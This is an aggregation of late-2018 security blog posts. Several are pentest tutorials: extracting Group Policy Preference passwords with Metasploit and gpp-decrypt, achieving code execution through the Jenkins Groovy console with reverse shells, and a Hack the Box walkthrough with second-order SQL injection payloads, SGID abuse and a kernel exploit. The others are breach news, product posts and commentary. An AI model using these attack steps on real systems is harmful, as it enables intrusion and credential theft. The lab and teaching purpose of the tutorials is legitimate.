  • Exploiting Group Policy Preferences via Metasploit -II
  • Gpp-Decrypt
  • GP3finder
  • Powershell Empire

What is Group Policy Preferences?

Group Policy preferences shortly term as GPP permit administrators to configure and install Windows and application settings that were previously unavailable using Group Policy. One of the most useful features of Group Policy Preferences (GPP) is the ability to store and moreover these policies can make all kinds of configuration changes to machines, like as:

  • Map drives
  • Create Local Users
  • Data Sources
  • Printer configuration
  • Registry Settings
  • Create/Update Services
  • Scheduled Tasks
  • Change local Administrator passwords

Why using GPP to create a user account is a bad Idea?

If you use Microsoft GPP to create a local administrator account, consider the safety consequences carefully. Since the password is stored in SYSVOL in a preferred item. SYSVOL is the domain-extensive share folder in the Active Directory accessed by all authenticated users.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

When a new GPP is created for the user or group account, it’ll interrelated with a Group.XML file created in SYSVOL with the relevant configuration information and the password is AES-256 bit encrypted. Therefore the password is not secure as all authenticated users have access to SYSVOL.

“In this article, we will be doing active directory penetration testing through Group Policy Preferences and try to steal store password from inside SYSVOL in multiple ways”.

Let’s Start!!

Lab Set-Up Requirement

  • Microsoft Windows Sever 2008 r2
  • Microsoft Windows 7/10
  • Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain Controller” using Group Policy Management.

Now create a new user account by navigating to: Computer Configuration > Control Panel Settings > Local Users and Groups.

Then Right click in the “Local Users and Groups” option and select New > Local User.

Then you get an interface for new local user property where you can create a new user account.

As you can observe from the given below image, we had created an account for user “raaz”.

Don’t forget to update group policy configuration.

So as I had already discussed above, that, whenever a new gpp is created for the user or group account, it will associated with a Group.XML which is stored inside /SYSVOl.

From the image below, you can see the entire path that leads to the file Group.xml. As you can see, this xml file holds cpassword for user raaz within the property tags in plain text.

Exploiting Group Policy Preferences via Metasploit -I

As we know an authorized user can access SYSVOL and suppose I know the client machine credential, let say raj:Ignite@123 then with help of this I can exploit Group Policy Preference to get XML file. Metasploit auxiliary module lets you enumerates files from target domain controllers by connecting to SMB as rouge user.

This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsofts public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit

Hence you can observe, that it has dump the password:abcd@123 from inside Group.xml file for user raaz.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provide a post exploit for enumerating cpassword, but for this you need to compromised target’s machine at least once and then you will be able to run below post exploit.

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsofts public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit

From the given below image you can observe, it has been found cpassword twice from two different locations:

  • C:\ProgramData\Microsoft\Group Policy\History\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
  • C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml


Another method is to connect with target’s machine via SMB and try to access /SYSVOL with the help smbclient. Therefore execute its command to access shared directory via authorized account and then move to following path to get Group.xml file: SYSVOL\sysvol\Pentes.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient // -U raj

As you can observe that, we have successfully transfer Group.xml in our local machine. As this file holds cpassword, so now we need to decrypt it.

For decryption we use ” gpp- decrypt” which is embedded in a simple ruby script in Kali Linux which decrypts a given GPP encrypted string.

Once you got access to Group.xml file, you can decrypt cpassword with the help of following syntax:

gpp-decrypt <encrypted cpassword >
gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dump password in plain text as shown below.


This is another script written in python for decrypting cpassword and you can download this tool from here.

Once you got access to Group.xml file, you can decrypt cpassword with the help of following syntax:

gpp-decrypt <encrypted cpassword >
gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dump password in plain text as shown below.

PowerShell Empire

This another framework just like Metasploit where you need to access low privilege shell. once you exploit target machine then use privesc/gpp module to extract password from inside Group.xml file.

This module Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

usemodule privesc/gpp

As a result, it dump password in plain text as shown below.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Penetration Testing on Group Policy Preferences appeared first on Hacking Articles.

Hackers defeat vein authentication by making a fake hand

Biometric security has moved beyond just fingerprints and face recognition to vein-based authentication. Unfortunately, hackers have already figured out a way to crack that, too. According to Motherboard, security researchers at the Chaos Communication Congress hacking conference in Leipzig, Germany showed a model wax hand that they used to defeat a vein authentication system using a wax model hand.

Source: Motherboard

NBlog Dec 29 – awareness case study

The drone incident at Gatwick airport makes a good backdrop for a security awareness case study discussion around resilience.  

It's a big story globally, all over the news, hence most participants will have heard something about it. Even if a few haven't, the situation is simple enough for them to pick up on and engage in the conversation.

The awareness objective is for participants to draw out, consider, discuss and learn about the information risk, information or cybersecurity aspects, in particular the resilience angle ... but actually, that's just part of it. It would be better if participants were able to generalize from the Gatwick drone incident, seeing parallels in their own lives (at work and at home) and ultimately respond appropriately. The response we're after involves workers changing their attitudes, decisions and behaviors e.g.:
  • Considering society's dependence on various activities, services, facilities, technologies etc., as well as the organization and their own dependencies, and ideally reducing dependence on vulnerable aspects;
  • Becoming more resilient i.e. stronger, more willing and able to cope with incidents and challenges of all kinds;
  • Identifying and reacting appropriately to various circumstances that are short on resilience e.g. avoiding placing undue reliance on relatively fragile or unreliable systems, comms, processes and relationships;
  • Perhaps even actively exploiting situations, gaining business advantage by persuading competitors or adversaries to rely unduly on their resilience arrangements (!).
Assorted journalists, authorities and bloggers are keen to point out that the Gatwick drone incident is 'a wake-up call' and that 'something must be done'. Most imply that they are concerned about other airports and, fair enough, the lessons are crystal clear in that context ... but we have deliberately expanded across other areas where resilience is just as important, along with risk, security, safety, reliability, technology and more.

That's a lot of awareness mileage from a public news story but, as with the awareness challenge, putting the concept into practice is where we earn our trivial fees!

Visit the website or contact me to find out more about the NoticeBored service, and to quote you a trivial price - so low in fact that avoiding a single relatively minor incident should more than justify the annual running costs of your entire security awareness and training program. 

By the way, we set our sights much higher than that!

McAfee 2018: Year in Review

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION®  Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

Exploiting Jenkins Groovy Script Console in Multiple Ways

Hello Friends!! There were so many possibilities to exploit Jenikins however we were interested in Script Console because Jenkins has lovely Groovy script console that permits anyone to run arbitrary Groovy scripts inside the Jenkins master runtime.

Table of Content

  • Jenkin’s Groovy Script Console
  • Metasploit
  • groovy
  • Groovy executing shell commands -I
  • Groovy executing shell commands -II

Jenkin’s Groovy Script Console

Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful language which offers the ability to do practically anything Java can do including:

  • Create sub-processes and execute arbitrary commands on the Jenkins master and agents.
  • It can even read files in which the Jenkins master has access to on the host (like /etc/passwd)
  • Decrypt credentials configured within Jenkins.
  • Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins.

Source :


This module uses the Jenkins-CI Groovy script console to execute OS commands using Java.

use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit

Metasploit uses command stager to exploit against command injection.

Hence, you can observe, that it has given meterpreter session of victim’s machine.


Suppose if you found Jenkins without login password or you are a normal user who has permission to access script console then you can exploit this privilege to get reverse shell of the machine. At Jenkins Dashboard go to Manage Jenkins and then select Script Console.

At script console, you have full privilege to run any program code, therefore I try to execute following piece of code which I had taken from Github to get reverse connection on my local machine via netcat listener.

nc -lvp 1234

Once the above script will be executed, it will give netcat session of victim’s machine.

Groovy executing shell commands -I

Similarly with the help of following piece of code which I found from this here, I try to create RCE for executing OS command through groovy script console. 

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"


Groovy executing shell commands -II

Similarly, I found another very small piece of code to exploit Groovy Console from here, which will generate RCE and execute shell command.

def cmd = "cmd.exe /c dir".execute();

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Exploiting Jenkins Groovy Script Console in Multiple Ways appeared first on Hacking Articles.

CVE-2018-1000887 (peel_shopping)

Peel shopping peel-shopping_9_1_0 version contains a Cross Site Scripting (XSS) vulnerability that can result in an authenticated user injecting java script code in the "Site Name EN" parameter. This attack appears to be exploitable if the malicious user has access to the administration account.

2018: The year of the data breach tsunami

It’s tough to remember all of the data breaches that happened in 2018. But when you look at the largest and most impactful ones that were reported throughout the year, it paints a grim picture about the state of data security today.

The consequences of major companies leaking sensitive data are many. For consumers, it represents a loss of privacy, potential identity theft, and countless hours repairing the damage to devices. And it’s costly for companies, too, in the form of bad press and the resulting damage to their reputation, as well as time and money spent to remediate the breach and ensure customers’ data is well secured in the future.

But despite the well-known costs of data breaches, the problem of leaky data isn’t getting better. While there were a greater number of breaches in 2017, 2018 saw breaches on a more massive scale and from marquee players, such as Facebook, Under Armor, Quora, and Panera Bread. Cybercriminals stole sensitive personally identifiable information (PII) from users, including email and physical addresses, passwords, credit card numbers, phone numbers, travel itineraries, passport data, and more.

You’d think these problems would cause companies to be extra diligent about discovering data breaches, but that doesn’t seem to be case. In reality, companies rarely discover data breaches themselves. According to Risk Based Security, only 13 percent of data breaches are discovered internally.

To help people better understand the modern problem of data breaches, TruthFinder created this infographic. It clarifies the extent of the crisis using statistics from the Identity Theft Threat Center and Experian. Take a look at the infographic below to get sense of why 2018 was the year of the data breach tsunami.

data breach

The post 2018: The year of the data breach tsunami appeared first on Malwarebytes Labs.

Hack the Box: Nightmare Walkthrough

Today we are going to solve another CTF challenge “Nightmare”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Nightmare is

Penetrating Methodology

  • Network scanning (Nmap)
  • Browsing IP address through HTTP
  • Checking for SQL injection vulnerability
  • Exploiting Second Order Injection
  • Login through SSH
  • Login through SFTP
  • Exploiting SFTP to gain reverse shell
  • Discovering files with SGID bit set
  • Privileges escalation using “sls”
  • Finding exploit for kernel
  • Making changes to the exploit
  • Getting root privilege using exploit
  • Getting root flag


Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sC -sV

The Nmap output shows us that there are 4 ports open: 80(HTTP), 2222(SSH)

We find that port 80 is running http, so we open the IP in our browser.

When we visit the webpage, we find a login page. After trying few SQL injection commands we find that this page is vulnerable to “second order SQL injection”. This means to exploit this vulnerability we have to register a user with our SQL injection query and then login with same username.

First we register a user with credentials “admin’):pass” using the register link on the login page. Now when we login using this user we get an SQL error on the web page.

After finding the web application is vulnerable to Second Order SQL Injection. We now find the number of columns. We register a user with the following credentials:

Username: admin ‘) order by 3#
Password: pass

We keep the password same for the user we register.

Now when we login, we get an SQL error that means the table has less than three columns. So we again register a user using the following query:

admin ‘) order by 2#

When we login, we find that we do not have an SQL error that means the table has 2 columns.

Now we are going to find the version of SQL database it is running. To find the version of the database we are going to register with the following query:

admin') union select 1, @@version#

After finding the version we now know that it is a MySQL database. Now we find the name of the database. To find the name of the database we register with the following query:

admin') union select 1, database()#

Now we get the database to be called “notes” but we want the names of all the databases on the server. So we register a user using the following query:

admin') union select 1, group_concat(distinct table_schema) from information_schema.tables#

We get another database called “sysadmin”; we find the table names inside “sysadmin”. To find the table names with we register the user with following query:

admin') union select 1, group_concat(distinct table_name) from information_schema.columns where table_schema="sysadmin"#

We find two tables called “users” and “configs”; we now find the column name inside “users” table. To find the column names we register a user with the following query:

admin') union select 1, group_concat(distinct column_name) from information_schema.columns where table_schema="sysadmin" and table_name="users"#

Now we find two columns called “username” and “password”. To find the data inside the columns we are going to register a user with the following query:

admin') union select 1, group_concat(username, 0x7c, password, 0x0a) from sysadmin.users#

Now we find different username passwords; we try to login through SSH using these credentials and find that we were able to login using the credentials “ftpuser:@whereyougo?” . We are unable to get a shell using SSH, instead we tried to connect using sftp and were successfully able to login.

ssh -p 2222 ftpuser@
sftp -p 2222 ftpuser@

Now as we are not able to get a shell using SSH, we tried to find sftp exploit and were able to find a exploit. You can download the exploit from here.

We made changes to the exploit so that we can get a reverse shell.

After making changes to the exploit, we setup our listener using netcat and then run the script.


On our listener we get a reverse shell.

nc -lvp 443

After getting the reverse shell we spawn a TTY shell. Then inside /home/decoder/ directory we find a directory called “test” and user called “user.txt”. As they belong to “decoder” group, we find files that belong to “decoder” group.

python -c "import pty; pty.spawn(‘/bin/bash’)"
find / -group “decoder” 2>/dev/null

Now running the sls command we find that it is a binary file that is running ls command. It also has SGID bit set, so we can abuse this to escalate our privilege.

We use strings command to check the binary and find that it is using system function to execute “ls” command.

strings /usr/bin/sls

Now as ls command is execute inside system function; we are going to use -b argument to execute our command.

sls -b '
bash -p'

After getting a shell we run “id” command and find that we have spawned a shell as user “decoder”. We now can open “user.txt” file and find the first flag.

Enumerating the system we now check the kernel version to check if there is any exploit available for privilege escalation.

uname -a

We find that the version of kernel is vulnerable to this exploit here.

We download the code on our machine and compile it using gcc. Then we start python http server and send the compiled exploit file to the target machine. When we run the exploit we are unable to get a privileged shell as it shows an error saying that the kernel version is not recognized.

In kali machine:

gcc -o priv 43418.c
python -m SimpleHTTPServer 80

On target machine:

chmod +x priv

Now we have to make a few changes for the exploit to work. So we opened the c file again and make the changes.

Now we again compile and send the file to the target machine. This time when we run the file we get an error saying permission denied on set_groups.

So we exited the shell and ran the exploit as ftpuser. As soon as we run the exploit we get a root shell.

We go to /root directory and find a file called “root.txt”. When we open the file we get the final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Box: Nightmare Walkthrough appeared first on Hacking Articles.

Weekly Update 119

Presently sponsored by: Live Workshop! Watch the Varonis DFIR team investigate a cyberattack using our data-centric security stack

Weekly Update 119

I'm home! And it's a nice hot Christmas! And I've got a new car! And that's where the discussion kinda started heading south this week. As I say in the video, the reaction to my tweet about it was actually overwhelmingly positive, but there was this unhealthy undercurrent of negativity which was really disappointing to see. Several other non-related events following that demonstrated similar online aggressiveness and I don't know if it was a case of too much eggnog or simply people having more downtime to be dicks online, but it was a really odd spate of bad behaviour.

Be that as it may, I hope there's some useful content in this one but I do appreciate the car bit in particular may not be relevant to a lot of people. In case you want to skip it, that bit starts at about the 3-minute mark and goes until the 28-minute mark. For those that do watch it, I hope you enjoy something a little bit different this week whether you agree with my choice or not 🙂

Weekly Update 119
Weekly Update 119
Weekly Update 119


  1. It's a new car! (that's the tweet with the pics and all the likes, but if you dig far enough, you'll see a negative undercurrent too)
  2. The Tesla is a great car, but it's not for everyone (some people just look for different things in a car, and that's absolutely fine)
  3. Scott Helme got himself blocked while trying to understand the barriers to HTTPS adoption (if it wasn't for the fact this is becoming an alarming trend amongst those pushing back against secure connections, it would be unremarkable)
  4. I got myself chastised for saying this is an alarming trend! (seriously people, the issue here is people ignorantly blocking people like Scott, not people saying that being ignorant is ignorant!)
  5. Scott wrote a good piece on how to actually implement HTTPS and remain compatible with non-supporting clients (this is where we should be - talking about technical solutions - leave the emotional baggage at home)
  6. The HTTPS discussion is reminiscent of Scott's anti-vaxxers post (discard the science, block out the expert voices)
  7. I've got a post I'm working on about fundamental financial lessons for tech people (there's a heap of support in that tweet and I'm really excited about publishing it on Monday!)
  8. Tech Fabric are sponsoring my blog this week (a big thanks to those guys for supporting me over the course of 2018, check them out for scalable, reliable and secure cloud native apps)

NBlog Dec 28 – US Dept of Commerce shutdown

Earlier this year I heard about the threatened shutdown of WWV and WWVH, NIST's standard time and frequency services, due to the withdrawal of government funding - an outrageous proposal for those of us around the world who use NIST's scientific services routinely to calibrate our clocks and radios.

Today while hunting for a NIST security standard that appears to no longer be online, I was shocked to learn that it's not just WWV that is closing down: it turns out all of NIST is under threat, in fact the entire US Department of Commerce.

Naturally, being a large bureaucratic government organization, there is a detailed plan for the shutdown with details of certain 'exempt' government services that must be maintained according to US law although how those services and people are to be paid is unclear to me. After the funding ceases, DoC employees are required (or is that requested?) to turn up for work for a few more hours to set their out-of-office notifications (on the IT systems that are presumably about to be turned off?), then piss off basically.  

To me, that's an almost unbelievably callous way to treat public servants. 

So is this fake news? Is it "just politics", brinkmanship by Mr Trump's administration I wonder? 

The root cause, I presume, is the usual disparity between the government's income and expenses, fueled by battles between the political parties plus their 'lobbyists' and the extraordinarily xenophobic pressure to spend spend spend on 'defense'. I gather US-Mexico border wall is, after all (surprise surprise) to be funded by the US, so that's yet another splash of red ink across the government's books.

Using the blockchain to create secure backups

“Oh no! I’ve got a ransomware notice on my workstation. How did this happen?”

“Let’s figure that out later. First, apply the backup from a few minutes ago, so we can continue to work.”

Now that wasn’t so painful, was it? Having a rollback solution or a recent backup could make this ideal post ransomware–infection scenario possible. But which technology could make this work? And is it possible today?

As we have pointed out before, blockchain technology is not for cryptocurrencies alone. In fact, a few vendors are already offering to use the blockchain to create recent, secured backups.


With ransomware still one of the most prevalent threats, having backups is one of the most advised strategies against having to pay a ransom. Paying ransoms not only fuels the ransomware industry, it is likely to become illegal in some states and countries.

For backups to be as effective as possible:

  • They need to be recent.
  • They shouldn’t be destroyed in the same accident or incident as the originals.
  • They should be secure against tampering and theft.
  • They should be easy to deploy.

To achieve these goals, creating backups in several locations, on different media, and encrypted if necessary goes a long way. This is exactly why using blockchain technology makes sense.


A quick reminder about how blockchain works. Blockchain is a decentralized system that can keep track of changes in the form of a distributed database that keeps a continuously growing list of transactions. Every change in the block results in a different hash value. This provides the opportunity to add a digital signature to each set of data. So, ideally you can be sure that the backup you are about to deploy is recent and hasn’t been tampered with by unauthorized hands.

How it should work

Blockchain technology is a decentralized ledger. Each transaction keeps an identical copy of the previous one. The authenticity of the copies can be confirmed by any of the nodes. The nodes are the “workers” that calculate a valid hash for the next block in the blockchain.

This means that if the first block would hold an encrypted copy of all the files you use today, each next block would include a copy of that set plus all the changes that have been made before the next hash that was accepted by the network of nodes. And each next block would hold all the information in the previous one plus all the changes since then.

Since every node has access to the list of changes, this makes the process completely transparent. Every transaction is recorded, and adding a fingerprint hardens the process against tampering. The architecture of the blockchain makes it impossible to manipulate or change the outcome, and it takes consensus from the nodes to create a legal “fork.”

“Fork” is the term used to describe the situation where two or more valid chains of blocks exist. Or better said, where two blocks of the same height, or with the same block number in the following order, exist at the same time. In a normal situation, the majority decides for one block as the foundation for the rest of the chain and the other fork is abandoned. Sometimes forks are used on purpose to split off a chain for a change in protocol. These are called “hard forks.”

Possible additional features

Timestamps: A backup method using this kind of blockchain technology could also be used as legal proof that a document has not been changed since the time it was included in the backups.

History of changes: A similar method can also be used to keep track of the authorized changes that were made to a document, and record when they took place and who made them.


Companies looking to deploy blockchain technology to create secure backups need to heed a few pitfalls, especially if they intend to limit the number of nodes to keep them inside the company.

Small networks are vulnerable to attacks by the majority. Blockchain technology is constructed so that the majority decides. And if you can find a way to provide more than half of the computing power active on the network, you can create your own false fork. In cryptocurrencies, such an attack can allow double spending, which leaves one receiving end in the cold. Some cryptocurrencies like Bitcoin Gold (BTG) have found out the hard way that these so-called 51 percent attacks can work. It cost exchanges several millions of dollars.

Another possible problem with keeping the number of nodes small is the Sybil attack. A Sybil attack happens when a node in a network uses multiple identities. This is a procedure that can allow an attacker to outvote honest nodes by controlling or creating a majority. Where a 51 percent attack would be solely based on computing power, some networks use a factor called “reputation” as an additional weighing factor for the influence of the nodes.

Sybil attack

Your node controls the Sybil nodes attempting to gain total control. Image courtesy of CoinCentral.

User behavior is always a concern. You can create the safest backup system, but a disgruntled employee could frustrate the whole effort. And insiders do not even have to have bad motives to corrupt the system. They may do it out of ignorance or with the best intentions. They may want to sweep something under the rug and unwittingly remove or corrupt more than they expected.

Deleted files could be a problem in some setups. This is something to keep in mind. Having the hash of the deleted file and the date when it was removed may not always be satisfactory. Even if you know when and by whom a file was deleted, that will not bring it back. Depending on the way the backup system is set up, this may be solved with some digging in old backups, or they may be lost forever.

The underlying problem for this is: Do you want every version of every document to be available at all times, or is it okay to have the original and the latest version with a historical overview of when it was changed and by whom? Ideally there should be some middle ground, for example, complete backups once a year and incremental backups done by the blockchain.

Large node networks

To prevent any type of majority attack, companies could decide to use larger, established networks like the Ethereum Project, but this may collide with policies of not sharing any kind of data outside their own network. Even if it is only the hashes and timestamps of the filesystem, this could clue others into what’s going on. And the costs for the nodes calculating the hashes (the miners) could prove to be more expensive than current backup solutions.

So when can we expect to see this happening?

I think we will see more progress made in this field in the near future. Incremental backup and keeping track of changes has blockchain written all over it. But a viable solution should have a large network behind it. And there are some other pitfalls to keep in mind when designing and setting up such a backup system. It may not be ready yet to be your only solution, but it seems to be an ideal fix to have incremental backups on a blockchain combined with full backups at set intervals.

The post Using the blockchain to create secure backups appeared first on Malwarebytes Labs.

Why it’s Time to Switch from Facebook Login to a Password Manager

Social media sites are increasingly the focus of our digital lives. Not only do we share, interact and post on platforms like Facebook —we also use these sites to quickly log into our favorite apps and websites. But what happens when these social media gatekeepers are hacked? Awhile back, Facebook suffered a major attack when hackers obtained the digital keys to access at least 30 million accounts (originally thought to be 50 million), exposing highly sensitive personal details.

The attack not only gave the bad guys access to the Facebook accounts but raised the prospect of them also being able to access any linked apps or websites. The message is clear: it may be time to store log-ins for these third-party accounts in a password manager, rather than a frequently targeted social media company.

What happened, exactly?

As a Facebook user, you’re probably well-aware of the ease-of-use benefit of logging-in to your third-party website and application accounts using your Facebook credentials. Known as Facebook Connect, this is what’s called a “Single Sign-On” feature: a fast, simple, and straightforward way to log in to your various accounts, so you don’t have to remember multiple different passwords for different sites and apps.

Convenient, eh? But here’s the problem. At the end of September (in 2018), Facebook discovered a major security issue: attackers managed to steal the crucial access tokens which act as “digital keys” to keep you logged into the site without having to re-enter your password each time you use Facebook. These keys also provide access to all those third-party applications and websites you log-in to via Facebook: everything from Airbnb and Amazon to Tinder and your favorite news apps. Since there’s a chance that the bad guys were also able to illegally access these, they may have been able to gather more of your sensitive info across these accounts to commit identity theft—and thereby gain access to your credit cards as well.

How did the hackers grab these all-important access tokens? By exploiting several bugs in Facebook’s “View As” and video posting features. (View As is a feature that allows users to see what their own profile looks like to someone else). They ultimately stole access tokens for 30 million  users; accessed just name and contact details for 15 million; virtually all profile info including name, contact details, username, gender, language, relationship status, religion, etc. for 14 million; and no info at all for 1 million.

Facebook has been quick to point out that there are currently no signs the attackers did access any of third-party apps using Facebook SSO. However, that may change. It also doesn’t alter the fact that a similar incident like this, or worse, could happen in the future. Social media and web providers like Facebook are a major target for attackers, while human error will inevitably lead to some security mistakes in the future. A bug in Google’s code recently exposed the data of 500,000 users of its Google+ social platform, which has prompted their decision to shut down the consumer side of the site within the next 10 months (as of October 2018).

How can I stay safe?


Facebook has fixed the bugs in question and reset the access tokens of those affected by this breach, which should help to stop future attacks. However, if your account was illegally accessed in the attack, there are a few steps you should take:

  • Visit this link to get a yes or no answer on whether you were affected.
  • Be on the lookout for scams: Fraudsters may call, email or send you messages using the info they’ve obtained from the breach.
  • Beware of phishing emails: scammers might try to capitalize on the notoriety of the incident to get you to part with sensitive info, by sending emails pretending to come from Facebook. Here’s how to confirm if they’re real or not.
  • You may need to call your bank: if you were in the second group of 14m users, the hackers may have enough personal info on you to answer security questions to access your accounts. Consider adding further layers of security.

Take preventative steps

After the above, consider the following options to keep all your accounts secure going forward:

  • Disable Facebook SSO. Go toyour Facebook settings and remove all apps under Active Apps and Websites. Then under Apps, Websites and Games go to Preferences and click on Edit then Turn Off.
  • Switch on two-factor authentication: this will add an extra layer of security to your Facebook log-in. Visit Facebook’s Settings> Security and login> Setting up extra security> Use two-factor authentication.
  • Consider Facebook’s app password generator: If you wish to maintain app and website connections, this function lets you generate unique passwords for your linked apps and websites, instead of using the Facebook SSO password. However, these passwords can’t be stored in a password manager, and if you log out of the app, you’ll have to generate a fresh password.
  • Better yet, invest in a password manager to securely generate and store strong and unique passwords for each of your Facebook linked apps and websites.

Will it affect my use of Facebook?

If you disable Facebook SSO there may be some loss of sharing functionality. For example, you might find that you can’t post/share articles from within news apps direct to Facebook, and instead have to cut and paste the link manually. It will depend, however, on the apps you’re using. At the end of the day, you need to decide what’s more important to you: tighter integration between apps/websites and Facebook, or keeping your passwords in a separate, secure place away from the social media company.

How can Trend Micro help?

Trend Micro Password Manager can help you to protect the privacy and security of your app and website account passwords across PCs and Macs, and Android and iOS mobile devices. Use it as a highly user-friendly but more-secure alternative to Facebook SSO. Trend Micro Password Manager

  • Generates highly secure, unique, and tough-to-hack passwords for each of your online accounts.
  • Securely stores and replays these credentials for log-ins, so you don’t have to remember them.
  • Offers an easy way to change passwords, if any do end up being leaked or stolen.
  • Makes it quick and easy to manage your passwords from any location, on any device and browser.
  • Works across both apps and websites, with particular benefit for apps you use in conjunction with Facebook on your mobile devices.

For more information, or to purchase the product, go to our Trend Micro Password Manager website. Note that Trend Micro Password Manager is automatically installed with Trend Micro Maximum Security.

The post Why it’s Time to Switch from Facebook Login to a Password Manager appeared first on .

Chinese Hackers Pose a Serious Threat to Military Contractors

Chinese hackers have successfully breached contractors for the U.S. Navy, according to WSJ report.

The years-long Marriott Starwood database breach was almost certainly the work of nation-state hackers sponsored by China, likely as part of a larger campaign by Chinese hackers to breach health insurers and government security clearance files, The New York Times reports. Why would foreign spies be so interested in the contents of a hotel’s guest database? Turns out “Marriott is the top hotel provider for American government and military personnel.” The Starwood database contained a treasure trove of highly detailed information about these personnel’s movements around the world.

Chinese hackers didn’t stop there. According to a report published in the Wall Street Journal last week, nation-state hackers sponsored by China have successfully breached numerous third-party contractors working for the U.S. Navy on multiple occasions over the past 18 months. The data stolen included highly classified information about advanced military technology currently under development, including “secret plans to build a supersonic anti-ship missile planned for use by American submarines.” The WSJ noted that hackers specifically targeted third-party federal contractors because many are small firms that lack the financial resources to invest in robust cyber security defenses.

In testimony before a Senate Judiciary Committee hearing, FBI counterintelligence division head E.W. “Bill” Priestap Wednesday called cyberespionage on the part of Chinese hackers the “most severe” threat to American security, citing the country’s “relentless theft of U.S. assets” in an effort to “supplant [the United States] as the world’s superpower.”

Inconsistent security practices leave U.S. Ballistic Missile Defense System vulnerable to cyber attacks

While the Navy has been hit particularly hard, the entire U.S. government, including all branches of the military, are under constant threats of cyber attack from Chinese hackers and other nation-state actors – and they’re ill-prepared to fend off these attacks. Around the same time the Marriott Starwood breach was disclosed, the Defense Department Office of Inspector General (OIG) released an audit report citing inconsistent security practices at DoD facilities, including facilities managed by third-party contractors, that store technical information on the nation’s ballistic missile defense system (BMDS). The report described failures to enact basic security measures, such as:

  • Requiring the use of multifactor authentication to access BMDS technical information
  • Identifying and mitigating known network vulnerabilities
  • Locking server racks
  • Protecting and monitoring classified data stored on removable media
  • Encrypting BMDS technical information transmission
